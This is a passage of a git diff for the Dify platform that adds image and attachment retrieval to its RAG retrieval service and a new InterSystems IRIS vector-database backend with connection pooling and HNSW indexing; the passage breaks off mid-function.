DataPostProcessor from core.rag.datasource.keyword.keyword_factory import Keyword from core.rag.datasource.vdb.vector_factory import Vector from core.rag.embedding.retrieval import RetrievalSegments from core.rag.entities.metadata_entities import MetadataCondition -from 
core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.rerank_type import RerankMode from core.rag.retrieval.retrieval_methods import RetrievalMethod +from core.tools.signature import sign_upload_file from extensions.ext_database import db -from models.dataset import ChildChunk, Dataset, DocumentSegment +from models.dataset import ChildChunk, Dataset, DocumentSegment, SegmentAttachmentBinding from models.dataset import Document as DatasetDocument +from models.model import UploadFile from services.external_knowledge_service import ExternalDatasetService default_retrieval_model = { @@ -37,14 +44,15 @@ class RetrievalService: retrieval_method: RetrievalMethod, dataset_id: str, query: str, - top_k: int, + top_k: int = 4, score_threshold: float | None = 0.0, reranking_model: dict | None = None, reranking_mode: str = "reranking_model", weights: dict | None = None, document_ids_filter: list[str] | None = None, + attachment_ids: list | None = None, ): - if not query: + if not query and not attachment_ids: return [] dataset = cls._get_dataset(dataset_id) if not dataset: @@ -56,69 +64,52 @@ class RetrievalService: # Optimize multithreading with thread pools with ThreadPoolExecutor(max_workers=dify_config.RETRIEVAL_SERVICE_EXECUTORS) as executor: # type: ignore futures = [] - if retrieval_method == RetrievalMethod.KEYWORD_SEARCH: + retrieval_service = RetrievalService() + if query: futures.append( executor.submit( - cls.keyword_search, + retrieval_service._retrieve, flask_app=current_app._get_current_object(), # type: ignore - dataset_id=dataset_id, - query=query, - top_k=top_k, - all_documents=all_documents, - exceptions=exceptions, - document_ids_filter=document_ids_filter, - ) - ) - if RetrievalMethod.is_support_semantic_search(retrieval_method): - futures.append( - executor.submit( - cls.embedding_search, - flask_app=current_app._get_current_object(), # type: ignore - dataset_id=dataset_id, + retrieval_method=retrieval_method, + dataset=dataset, query=query, top_k=top_k, score_threshold=score_threshold, reranking_model=reranking_model, - all_documents=all_documents, - retrieval_method=retrieval_method, - exceptions=exceptions, + reranking_mode=reranking_mode, + weights=weights, document_ids_filter=document_ids_filter, + attachment_id=None, + all_documents=all_documents, + exceptions=exceptions, ) ) - if RetrievalMethod.is_support_fulltext_search(retrieval_method): - futures.append( - executor.submit( - cls.full_text_index_search, - flask_app=current_app._get_current_object(), # type: ignore - dataset_id=dataset_id, - query=query, - top_k=top_k, - score_threshold=score_threshold, - reranking_model=reranking_model, - all_documents=all_documents, - retrieval_method=retrieval_method, - exceptions=exceptions, - document_ids_filter=document_ids_filter, + if attachment_ids: + for attachment_id in attachment_ids: + futures.append( + executor.submit( + retrieval_service._retrieve, + flask_app=current_app._get_current_object(), # type: ignore + retrieval_method=retrieval_method, + dataset=dataset, + query=None, + top_k=top_k, + score_threshold=score_threshold, + reranking_model=reranking_model, + reranking_mode=reranking_mode, + weights=weights, + document_ids_filter=document_ids_filter, + attachment_id=attachment_id, + 
all_documents=all_documents, + exceptions=exceptions, + ) ) - ) - concurrent.futures.wait(futures, timeout=30, return_when=concurrent.futures.ALL_COMPLETED) + + concurrent.futures.wait(futures, timeout=3600, return_when=concurrent.futures.ALL_COMPLETED) if exceptions: raise ValueError(";\n".join(exceptions)) - # Deduplicate documents for hybrid search to avoid duplicate chunks - if retrieval_method == RetrievalMethod.HYBRID_SEARCH: - all_documents = cls._deduplicate_documents(all_documents) - data_post_processor = DataPostProcessor( - str(dataset.tenant_id), reranking_mode, reranking_model, weights, False - ) - all_documents = data_post_processor.invoke( - query=query, - documents=all_documents, - score_threshold=score_threshold, - top_n=top_k, - ) - return all_documents @classmethod @@ -223,6 +214,7 @@ class RetrievalService: retrieval_method: RetrievalMethod, exceptions: list, document_ids_filter: list[str] | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ): with flask_app.app_context(): try: @@ -231,14 +223,30 @@ class RetrievalService: raise ValueError("dataset not found") vector = Vector(dataset=dataset) - documents = vector.search_by_vector( - query, - search_type="similarity_score_threshold", - top_k=top_k, - score_threshold=score_threshold, - filter={"group_id": [dataset.id]}, - document_ids_filter=document_ids_filter, - ) + documents = [] + if query_type == QueryType.TEXT_QUERY: + documents.extend( + vector.search_by_vector( + query, + search_type="similarity_score_threshold", + top_k=top_k, + score_threshold=score_threshold, + filter={"group_id": [dataset.id]}, + document_ids_filter=document_ids_filter, + ) + ) + if query_type == QueryType.IMAGE_QUERY: + if not dataset.is_multimodal: + return + documents.extend( + vector.search_by_file( + file_id=query, + top_k=top_k, + score_threshold=score_threshold, + filter={"group_id": [dataset.id]}, + document_ids_filter=document_ids_filter, + ) + ) if documents: if ( @@ -250,14 +258,37 @@ class RetrievalService: data_post_processor = DataPostProcessor( str(dataset.tenant_id), str(RerankMode.RERANKING_MODEL), reranking_model, None, False ) - all_documents.extend( - data_post_processor.invoke( - query=query, - documents=documents, - score_threshold=score_threshold, - top_n=len(documents), + if dataset.is_multimodal: + model_manager = ModelManager() + is_support_vision = model_manager.check_model_support_vision( + tenant_id=dataset.tenant_id, + provider=reranking_model.get("reranking_provider_name") or "", + model=reranking_model.get("reranking_model_name") or "", + model_type=ModelType.RERANK, + ) + if is_support_vision: + all_documents.extend( + data_post_processor.invoke( + query=query, + documents=documents, + score_threshold=score_threshold, + top_n=len(documents), + query_type=query_type, + ) + ) + else: + # not effective, return original documents + all_documents.extend(documents) + else: + all_documents.extend( + data_post_processor.invoke( + query=query, + documents=documents, + score_threshold=score_threshold, + top_n=len(documents), + query_type=query_type, + ) ) - ) else: all_documents.extend(documents) except Exception as e: @@ -339,103 +370,161 @@ class RetrievalService: records = [] include_segment_ids = set() segment_child_map = {} - - # Process documents - for document in documents: - document_id = document.metadata.get("document_id") - if document_id not in dataset_documents: - continue - - dataset_document = dataset_documents[document_id] - if not dataset_document: - continue - - if dataset_document.doc_form 
== IndexType.PARENT_CHILD_INDEX: - # Handle parent-child documents - child_index_node_id = document.metadata.get("doc_id") - child_chunk_stmt = select(ChildChunk).where(ChildChunk.index_node_id == child_index_node_id) - child_chunk = db.session.scalar(child_chunk_stmt) - - if not child_chunk: + segment_file_map = {} + with Session(bind=db.engine, expire_on_commit=False) as session: + # Process documents + for document in documents: + segment_id = None + attachment_info = None + child_chunk = None + document_id = document.metadata.get("document_id") + if document_id not in dataset_documents: continue - segment = ( - db.session.query(DocumentSegment) - .where( - DocumentSegment.dataset_id == dataset_document.dataset_id, - DocumentSegment.enabled == True, - DocumentSegment.status == "completed", - DocumentSegment.id == child_chunk.segment_id, - ) - .options( - load_only( - DocumentSegment.id, - DocumentSegment.content, - DocumentSegment.answer, + dataset_document = dataset_documents[document_id] + if not dataset_document: + continue + + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: + # Handle parent-child documents + if document.metadata.get("doc_type") == DocType.IMAGE: + attachment_info_dict = cls.get_segment_attachment_info( + dataset_document.dataset_id, + dataset_document.tenant_id, + document.metadata.get("doc_id") or "", + session, ) + if attachment_info_dict: + attachment_info = attachment_info_dict["attachment_info"] + segment_id = attachment_info_dict["segment_id"] + else: + child_index_node_id = document.metadata.get("doc_id") + child_chunk_stmt = select(ChildChunk).where(ChildChunk.index_node_id == child_index_node_id) + child_chunk = session.scalar(child_chunk_stmt) + + if not child_chunk: + continue + segment_id = child_chunk.segment_id + + if not segment_id: + continue + + segment = ( + session.query(DocumentSegment) + .where( + DocumentSegment.dataset_id == dataset_document.dataset_id, + DocumentSegment.enabled == True, + DocumentSegment.status == "completed", + DocumentSegment.id == segment_id, + ) + .first() ) - .first() - ) - if not segment: - continue + if not segment: + continue - if segment.id not in include_segment_ids: - include_segment_ids.add(segment.id) - child_chunk_detail = { - "id": child_chunk.id, - "content": child_chunk.content, - "position": child_chunk.position, - "score": document.metadata.get("score", 0.0), - } - map_detail = { - "max_score": document.metadata.get("score", 0.0), - "child_chunks": [child_chunk_detail], - } - segment_child_map[segment.id] = map_detail - record = { - "segment": segment, - } - records.append(record) + if segment.id not in include_segment_ids: + include_segment_ids.add(segment.id) + if child_chunk: + child_chunk_detail = { + "id": child_chunk.id, + "content": child_chunk.content, + "position": child_chunk.position, + "score": document.metadata.get("score", 0.0), + } + map_detail = { + "max_score": document.metadata.get("score", 0.0), + "child_chunks": [child_chunk_detail], + } + segment_child_map[segment.id] = map_detail + record = { + "segment": segment, + } + if attachment_info: + segment_file_map[segment.id] = [attachment_info] + records.append(record) + else: + if child_chunk: + child_chunk_detail = { + "id": child_chunk.id, + "content": child_chunk.content, + "position": child_chunk.position, + "score": document.metadata.get("score", 0.0), + } + if segment.id in segment_child_map: + segment_child_map[segment.id]["child_chunks"].append(child_chunk_detail) + segment_child_map[segment.id]["max_score"] 
= max( + segment_child_map[segment.id]["max_score"], document.metadata.get("score", 0.0) + ) + else: + segment_child_map[segment.id] = { + "max_score": document.metadata.get("score", 0.0), + "child_chunks": [child_chunk_detail], + } + if attachment_info: + if segment.id in segment_file_map: + segment_file_map[segment.id].append(attachment_info) + else: + segment_file_map[segment.id] = [attachment_info] else: - child_chunk_detail = { - "id": child_chunk.id, - "content": child_chunk.content, - "position": child_chunk.position, - "score": document.metadata.get("score", 0.0), - } - segment_child_map[segment.id]["child_chunks"].append(child_chunk_detail) - segment_child_map[segment.id]["max_score"] = max( - segment_child_map[segment.id]["max_score"], document.metadata.get("score", 0.0) - ) - else: - # Handle normal documents - index_node_id = document.metadata.get("doc_id") - if not index_node_id: - continue - document_segment_stmt = select(DocumentSegment).where( - DocumentSegment.dataset_id == dataset_document.dataset_id, - DocumentSegment.enabled == True, - DocumentSegment.status == "completed", - DocumentSegment.index_node_id == index_node_id, - ) - segment = db.session.scalar(document_segment_stmt) + # Handle normal documents + segment = None + if document.metadata.get("doc_type") == DocType.IMAGE: + attachment_info_dict = cls.get_segment_attachment_info( + dataset_document.dataset_id, + dataset_document.tenant_id, + document.metadata.get("doc_id") or "", + session, + ) + if attachment_info_dict: + attachment_info = attachment_info_dict["attachment_info"] + segment_id = attachment_info_dict["segment_id"] + document_segment_stmt = select(DocumentSegment).where( + DocumentSegment.dataset_id == dataset_document.dataset_id, + DocumentSegment.enabled == True, + DocumentSegment.status == "completed", + DocumentSegment.id == segment_id, + ) + segment = session.scalar(document_segment_stmt) + if segment: + segment_file_map[segment.id] = [attachment_info] + else: + index_node_id = document.metadata.get("doc_id") + if not index_node_id: + continue + document_segment_stmt = select(DocumentSegment).where( + DocumentSegment.dataset_id == dataset_document.dataset_id, + DocumentSegment.enabled == True, + DocumentSegment.status == "completed", + DocumentSegment.index_node_id == index_node_id, + ) + segment = session.scalar(document_segment_stmt) - if not segment: - continue - - include_segment_ids.add(segment.id) - record = { - "segment": segment, - "score": document.metadata.get("score"), # type: ignore - } - records.append(record) + if not segment: + continue + if segment.id not in include_segment_ids: + include_segment_ids.add(segment.id) + record = { + "segment": segment, + "score": document.metadata.get("score"), # type: ignore + } + if attachment_info: + segment_file_map[segment.id] = [attachment_info] + records.append(record) + else: + if attachment_info: + attachment_infos = segment_file_map.get(segment.id, []) + if attachment_info not in attachment_infos: + attachment_infos.append(attachment_info) + segment_file_map[segment.id] = attachment_infos # Add child chunks information to records for record in records: if record["segment"].id in segment_child_map: record["child_chunks"] = segment_child_map[record["segment"].id].get("child_chunks") # type: ignore record["score"] = segment_child_map[record["segment"].id]["max_score"] + if record["segment"].id in segment_file_map: + record["files"] = segment_file_map[record["segment"].id] # type: ignore[assignment] result = [] for record in records: @@ 
-447,6 +536,11 @@ class RetrievalService: if not isinstance(child_chunks, list): child_chunks = None + # Extract files, ensuring it's a list or None + files = record.get("files") + if not isinstance(files, list): + files = None + # Extract score, ensuring it's a float or None score_value = record.get("score") score = ( @@ -456,10 +550,149 @@ class RetrievalService: ) # Create RetrievalSegments object - retrieval_segment = RetrievalSegments(segment=segment, child_chunks=child_chunks, score=score) + retrieval_segment = RetrievalSegments( + segment=segment, child_chunks=child_chunks, score=score, files=files + ) result.append(retrieval_segment) return result except Exception as e: db.session.rollback() raise e + + def _retrieve( + self, + flask_app: Flask, + retrieval_method: RetrievalMethod, + dataset: Dataset, + query: str | None = None, + top_k: int = 4, + score_threshold: float | None = 0.0, + reranking_model: dict | None = None, + reranking_mode: str = "reranking_model", + weights: dict | None = None, + document_ids_filter: list[str] | None = None, + attachment_id: str | None = None, + all_documents: list[Document] = [], + exceptions: list[str] = [], + ): + if not query and not attachment_id: + return + with flask_app.app_context(): + all_documents_item: list[Document] = [] + # Optimize multithreading with thread pools + with ThreadPoolExecutor(max_workers=dify_config.RETRIEVAL_SERVICE_EXECUTORS) as executor: # type: ignore + futures = [] + if retrieval_method == RetrievalMethod.KEYWORD_SEARCH and query: + futures.append( + executor.submit( + self.keyword_search, + flask_app=current_app._get_current_object(), # type: ignore + dataset_id=dataset.id, + query=query, + top_k=top_k, + all_documents=all_documents_item, + exceptions=exceptions, + document_ids_filter=document_ids_filter, + ) + ) + if RetrievalMethod.is_support_semantic_search(retrieval_method): + if query: + futures.append( + executor.submit( + self.embedding_search, + flask_app=current_app._get_current_object(), # type: ignore + dataset_id=dataset.id, + query=query, + top_k=top_k, + score_threshold=score_threshold, + reranking_model=reranking_model, + all_documents=all_documents_item, + retrieval_method=retrieval_method, + exceptions=exceptions, + document_ids_filter=document_ids_filter, + query_type=QueryType.TEXT_QUERY, + ) + ) + if attachment_id: + futures.append( + executor.submit( + self.embedding_search, + flask_app=current_app._get_current_object(), # type: ignore + dataset_id=dataset.id, + query=attachment_id, + top_k=top_k, + score_threshold=score_threshold, + reranking_model=reranking_model, + all_documents=all_documents_item, + retrieval_method=retrieval_method, + exceptions=exceptions, + document_ids_filter=document_ids_filter, + query_type=QueryType.IMAGE_QUERY, + ) + ) + if RetrievalMethod.is_support_fulltext_search(retrieval_method) and query: + futures.append( + executor.submit( + self.full_text_index_search, + flask_app=current_app._get_current_object(), # type: ignore + dataset_id=dataset.id, + query=query, + top_k=top_k, + score_threshold=score_threshold, + reranking_model=reranking_model, + all_documents=all_documents_item, + retrieval_method=retrieval_method, + exceptions=exceptions, + document_ids_filter=document_ids_filter, + ) + ) + concurrent.futures.wait(futures, timeout=300, return_when=concurrent.futures.ALL_COMPLETED) + + if exceptions: + raise ValueError(";\n".join(exceptions)) + + # Deduplicate documents for hybrid search to avoid duplicate chunks + if retrieval_method == 
RetrievalMethod.HYBRID_SEARCH: + if attachment_id and reranking_mode == RerankMode.WEIGHTED_SCORE: + all_documents.extend(all_documents_item) + all_documents_item = self._deduplicate_documents(all_documents_item) + data_post_processor = DataPostProcessor( + str(dataset.tenant_id), reranking_mode, reranking_model, weights, False + ) + + query = query or attachment_id + if not query: + return + all_documents_item = data_post_processor.invoke( + query=query, + documents=all_documents_item, + score_threshold=score_threshold, + top_n=top_k, + query_type=QueryType.TEXT_QUERY if query else QueryType.IMAGE_QUERY, + ) + + all_documents.extend(all_documents_item) + + @classmethod + def get_segment_attachment_info( + cls, dataset_id: str, tenant_id: str, attachment_id: str, session: Session + ) -> dict[str, Any] | None: + upload_file = session.query(UploadFile).where(UploadFile.id == attachment_id).first() + if upload_file: + attachment_binding = ( + session.query(SegmentAttachmentBinding) + .where(SegmentAttachmentBinding.attachment_id == upload_file.id) + .first() + ) + if attachment_binding: + attachment_info = { + "id": upload_file.id, + "name": upload_file.name, + "extension": "." + upload_file.extension, + "mime_type": upload_file.mime_type, + "source_url": sign_upload_file(upload_file.id, upload_file.extension), + "size": upload_file.size, + } + return {"attachment_info": attachment_info, "segment_id": attachment_binding.segment_id} + return None diff --git a/api/core/rag/datasource/vdb/iris/__init__.py b/api/core/rag/datasource/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/rag/datasource/vdb/iris/iris_vector.py b/api/core/rag/datasource/vdb/iris/iris_vector.py new file mode 100644 index 0000000000..b1bfabb76e --- /dev/null +++ b/api/core/rag/datasource/vdb/iris/iris_vector.py @@ -0,0 +1,407 @@ +"""InterSystems IRIS vector database implementation for Dify. + +This module provides vector storage and retrieval using IRIS native VECTOR type +with HNSW indexing for efficient similarity search. 
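+Connections are pooled in a process-wide singleton to minimize IRIS license usage.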
+""" + +from __future__ import annotations + +import json +import logging +import threading +import uuid +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any + +from configs import dify_config +from configs.middleware.vdb.iris_config import IrisVectorConfig +from core.rag.datasource.vdb.vector_base import BaseVector +from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory +from core.rag.datasource.vdb.vector_type import VectorType +from core.rag.embedding.embedding_base import Embeddings +from core.rag.models.document import Document +from extensions.ext_redis import redis_client +from models.dataset import Dataset + +if TYPE_CHECKING: + import iris +else: + try: + import iris + except ImportError: + iris = None # type: ignore[assignment] + +logger = logging.getLogger(__name__) + +# Singleton connection pool to minimize IRIS license usage +_pool_lock = threading.Lock() +_pool_instance: IrisConnectionPool | None = None + + +def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool: + """Get or create the global IRIS connection pool (singleton pattern).""" + global _pool_instance # pylint: disable=global-statement + with _pool_lock: + if _pool_instance is None: + logger.info("Initializing IRIS connection pool") + _pool_instance = IrisConnectionPool(config) + return _pool_instance + + +class IrisConnectionPool: + """Thread-safe connection pool for IRIS database.""" + + def __init__(self, config: IrisVectorConfig) -> None: + self.config = config + self._pool: list[Any] = [] + self._lock = threading.Lock() + self._min_size = config.IRIS_MIN_CONNECTION + self._max_size = config.IRIS_MAX_CONNECTION + self._in_use = 0 + self._schemas_initialized: set[str] = set() # Cache for initialized schemas + self._initialize_pool() + + def _initialize_pool(self) -> None: + for _ in range(self._min_size): + self._pool.append(self._create_connection()) + + def _create_connection(self) -> Any: + return iris.connect( + hostname=self.config.IRIS_HOST, + port=self.config.IRIS_SUPER_SERVER_PORT, + namespace=self.config.IRIS_DATABASE, + username=self.config.IRIS_USER, + password=self.config.IRIS_PASSWORD, + ) + + def get_connection(self) -> Any: + """Get a connection from pool or create new if available.""" + with self._lock: + if self._pool: + conn = self._pool.pop() + self._in_use += 1 + return conn + if self._in_use < self._max_size: + conn = self._create_connection() + self._in_use += 1 + return conn + raise RuntimeError("Connection pool exhausted") + + def return_connection(self, conn: Any) -> None: + """Return connection to pool after validating it.""" + if not conn: + return + + # Validate connection health + is_valid = False + try: + cursor = conn.cursor() + cursor.execute("SELECT 1") + cursor.close() + is_valid = True + except (OSError, RuntimeError) as e: + logger.debug("Connection validation failed: %s", e) + try: + conn.close() + except (OSError, RuntimeError): + pass + + with self._lock: + self._pool.append(conn if is_valid else self._create_connection()) + self._in_use -= 1 + + def ensure_schema_exists(self, schema: str) -> None: + """Ensure schema exists in IRIS database. + + This method is idempotent and thread-safe. It uses a memory cache to avoid + redundant database queries for already-verified schemas. 
+ + Args: + schema: Schema name to ensure exists + + Raises: + Exception: If schema creation fails + """ + # Fast path: check cache first (no lock needed for read-only set lookup) + if schema in self._schemas_initialized: + return + + # Slow path: acquire lock and check again (double-checked locking) + with self._lock: + if schema in self._schemas_initialized: + return + + # Get a connection to check/create schema + conn = self._pool[0] if self._pool else self._create_connection() + cursor = conn.cursor() + try: + # Check if schema exists using INFORMATION_SCHEMA + check_sql = """ + SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA + WHERE SCHEMA_NAME = ? + """ + cursor.execute(check_sql, (schema,)) # Must be tuple or list + exists = cursor.fetchone()[0] > 0 + + if not exists: + # Schema doesn't exist, create it + cursor.execute(f"CREATE SCHEMA {schema}") + conn.commit() + logger.info("Created schema: %s", schema) + else: + logger.debug("Schema already exists: %s", schema) + + # Add to cache to skip future checks + self._schemas_initialized.add(schema) + + except Exception as e: + conn.rollback() + logger.exception("Failed to ensure schema %s exists", schema) + raise + finally: + cursor.close() + + def close_all(self) -> None: + """Close all connections (application shutdown only).""" + with self._lock: + for conn in self._pool: + try: + conn.close() + except (OSError, RuntimeError): + pass + self._pool.clear() + self._in_use = 0 + self._schemas_initialized.clear() + + +class IrisVector(BaseVector): + """IRIS vector database implementation using native VECTOR type and HNSW indexing.""" + + def __init__(self, collection_name: str, config: IrisVectorConfig) -> None: + super().__init__(collection_name) + self.config = config + self.table_name = f"embedding_{collection_name}".upper() + self.schema = config.IRIS_SCHEMA or "dify" + self.pool = get_iris_pool(config) + + def get_type(self) -> str: + return VectorType.IRIS + + @contextmanager + def _get_cursor(self): + """Context manager for database cursor with connection pooling.""" + conn = self.pool.get_connection() + cursor = conn.cursor() + try: + yield cursor + conn.commit() + except Exception: + conn.rollback() + raise + finally: + cursor.close() + self.pool.return_connection(conn) + + def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]: + dimension = len(embeddings[0]) + self._create_collection(dimension) + return self.add_texts(texts, embeddings) + + def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]: + """Add documents with embeddings to the collection.""" + added_ids = [] + with self._get_cursor() as cursor: + for i, doc in enumerate(documents): + doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4()) + metadata = json.dumps(doc.metadata) if doc.metadata else "{}" + embedding_str = json.dumps(embeddings[i]) + + sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)" + cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str)) + added_ids.append(doc_id) + + return added_ids + + def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin + try: + with self._get_cursor() as cursor: + sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?" 
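+                # IRIS DB-API expects parameters as a sequence, hence the one-element tuple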
+                cursor.execute(sql, (id,))
+                return cursor.fetchone() is not None
+        except (OSError, RuntimeError, ValueError):
+            return False
+
+    def delete_by_ids(self, ids: list[str]) -> None:
+        if not ids:
+            return
+
+        with self._get_cursor() as cursor:
+            placeholders = ",".join(["?" for _ in ids])
+            sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})"
+            cursor.execute(sql, ids)
+
+    def delete_by_metadata_field(self, key: str, value: str) -> None:
+        """Delete documents by metadata field (JSON LIKE pattern matching)."""
+        with self._get_cursor() as cursor:
+            pattern = f'%"{key}": "{value}"%'
+            sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?"
+            cursor.execute(sql, (pattern,))
+
+    def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]:
+        """Search similar documents using VECTOR_COSINE with HNSW index."""
+        top_k = kwargs.get("top_k", 4)
+        score_threshold = float(kwargs.get("score_threshold") or 0.0)
+        embedding_str = json.dumps(query_vector)
+
+        with self._get_cursor() as cursor:
+            sql = f"""
+                SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score
+                FROM {self.schema}.{self.table_name}
+                ORDER BY score DESC
+            """
+            cursor.execute(sql, (embedding_str,))
+
+            docs = []
+            for row in cursor.fetchall():
+                if len(row) >= 4:
+                    text, meta_str, score = row[1], row[2], float(row[3])
+                    if score >= score_threshold:
+                        metadata = json.loads(meta_str) if meta_str else {}
+                        metadata["score"] = score
+                        docs.append(Document(page_content=text, metadata=metadata))
+            return docs
+
+    def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]:
+        """Search documents by full-text using iFind index or fallback to LIKE search."""
+        top_k = kwargs.get("top_k", 5)
+
+        with self._get_cursor() as cursor:
+            if self.config.IRIS_TEXT_INDEX:
+                # Use iFind full-text search with index
+                text_index_name = f"idx_{self.table_name}_text"
+                sql = f"""
+                    SELECT TOP {top_k} id, text, meta
+                    FROM {self.schema}.{self.table_name}
+                    WHERE %ID %FIND search_index({text_index_name}, ?)
+                """
+                cursor.execute(sql, (query,))
+            else:
+                # Fallback to LIKE search (inefficient for large datasets)
+                query_pattern = f"%{query}%"
+                sql = f"""
+                    SELECT TOP {top_k} id, text, meta
+                    FROM {self.schema}.{self.table_name}
+                    WHERE text LIKE ?
+                """
+                cursor.execute(sql, (query_pattern,))
+
+            docs = []
+            for row in cursor.fetchall():
+                if len(row) >= 3:
+                    metadata = json.loads(row[2]) if row[2] else {}
+                    docs.append(Document(page_content=row[1], metadata=metadata))
+
+            if not docs:
+                logger.info("Full-text search for '%s' returned no results", query)
+
+            return docs
+
+    def delete(self) -> None:
+        """Delete the entire collection (drop table - permanent)."""
+        with self._get_cursor() as cursor:
+            sql = f"DROP TABLE {self.schema}.{self.table_name}"
+            cursor.execute(sql)
+
+    def _create_collection(self, dimension: int) -> None:
+        """Create table with VECTOR column and HNSW index.
+
+        Uses Redis lock to prevent concurrent creation attempts across multiple
+        API server instances (api, worker, worker_beat).
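+        The creation flag is cached in Redis for an hour, so subsequent calls skip the DDL.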
+ """ + cache_key = f"vector_indexing_{self._collection_name}" + lock_name = f"{cache_key}_lock" + + with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager + if redis_client.get(cache_key): + return + + # Ensure schema exists (idempotent, cached after first call) + self.pool.ensure_schema_exists(self.schema) + + with self._get_cursor() as cursor: + # Create table with VECTOR column + sql = f""" + CREATE TABLE {self.schema}.{self.table_name} ( + id VARCHAR(255) PRIMARY KEY, + text CLOB, + meta CLOB, + embedding VECTOR(DOUBLE, {dimension}) + ) + """ + logger.info("Creating table: %s.%s", self.schema, self.table_name) + cursor.execute(sql) + + # Create HNSW index for vector similarity search + index_name = f"idx_{self.table_name}_embedding" + sql_index = ( + f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} " + "(embedding) AS HNSW(Distance='Cosine')" + ) + logger.info("Creating HNSW index: %s", index_name) + cursor.execute(sql_index) + logger.info("HNSW index created successfully: %s", index_name) + + # Create full-text search index if enabled + logger.info( + "IRIS_TEXT_INDEX config value: %s (type: %s)", + self.config.IRIS_TEXT_INDEX, + type(self.config.IRIS_TEXT_INDEX), + ) + if self.config.IRIS_TEXT_INDEX: + text_index_name = f"idx_{self.table_name}_text" + language = self.config.IRIS_TEXT_INDEX_LANGUAGE + # Fixed: Removed extra parentheses and corrected syntax + sql_text_index = f""" + CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text) + AS %iFind.Index.Basic + (LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0) + """ + logger.info("Creating text index: %s with language: %s", text_index_name, language) + logger.info("SQL for text index: %s", sql_text_index) + cursor.execute(sql_text_index) + logger.info("Text index created successfully: %s", text_index_name) + else: + logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled") + + redis_client.set(cache_key, 1, ex=3600) + + +class IrisVectorFactory(AbstractVectorFactory): + """Factory for creating IrisVector instances.""" + + def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector: + if dataset.index_struct_dict: + class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"] + collection_name = class_prefix + else: + dataset_id = dataset.id + collection_name = Dataset.gen_collection_name_by_id(dataset_id) + index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name) + dataset.index_struct = json.dumps(index_struct_dict) + + return IrisVector( + collection_name=collection_name, + config=IrisVectorConfig( + IRIS_HOST=dify_config.IRIS_HOST, + IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT, + IRIS_USER=dify_config.IRIS_USER, + IRIS_PASSWORD=dify_config.IRIS_PASSWORD, + IRIS_DATABASE=dify_config.IRIS_DATABASE, + IRIS_SCHEMA=dify_config.IRIS_SCHEMA, + IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL, + IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION, + IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION, + IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX, + IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE, + ), + ) diff --git a/api/core/rag/datasource/vdb/vector_factory.py b/api/core/rag/datasource/vdb/vector_factory.py index 0beb388693..b9772b3c08 100644 --- a/api/core/rag/datasource/vdb/vector_factory.py +++ b/api/core/rag/datasource/vdb/vector_factory.py @@ -1,3 +1,4 @@ +import base64 import logging import time from abc import ABC, abstractmethod @@ -12,10 
+13,13 @@ from core.rag.datasource.vdb.vector_base import BaseVector from core.rag.datasource.vdb.vector_type import VectorType from core.rag.embedding.cached_embedding import CacheEmbedding from core.rag.embedding.embedding_base import Embeddings +from core.rag.index_processor.constant.doc_type import DocType from core.rag.models.document import Document from extensions.ext_database import db from extensions.ext_redis import redis_client +from extensions.ext_storage import storage from models.dataset import Dataset, Whitelist +from models.model import UploadFile logger = logging.getLogger(__name__) @@ -159,7 +163,7 @@ class Vector: from core.rag.datasource.vdb.lindorm.lindorm_vector import LindormVectorStoreFactory return LindormVectorStoreFactory - case VectorType.OCEANBASE: + case VectorType.OCEANBASE | VectorType.SEEKDB: from core.rag.datasource.vdb.oceanbase.oceanbase_vector import OceanBaseVectorFactory return OceanBaseVectorFactory @@ -183,6 +187,10 @@ class Vector: from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory return ClickzettaVectorFactory + case VectorType.IRIS: + from core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory + + return IrisVectorFactory case _: raise ValueError(f"Vector store {vector_type} is not supported.") @@ -203,6 +211,47 @@ class Vector: self._vector_processor.create(texts=batch, embeddings=batch_embeddings, **kwargs) logger.info("Embedding %s texts took %s s", len(texts), time.time() - start) + def create_multimodal(self, file_documents: list | None = None, **kwargs): + if file_documents: + start = time.time() + logger.info("start embedding %s files %s", len(file_documents), start) + batch_size = 1000 + total_batches = len(file_documents) + batch_size - 1 + for i in range(0, len(file_documents), batch_size): + batch = file_documents[i : i + batch_size] + batch_start = time.time() + logger.info("Processing batch 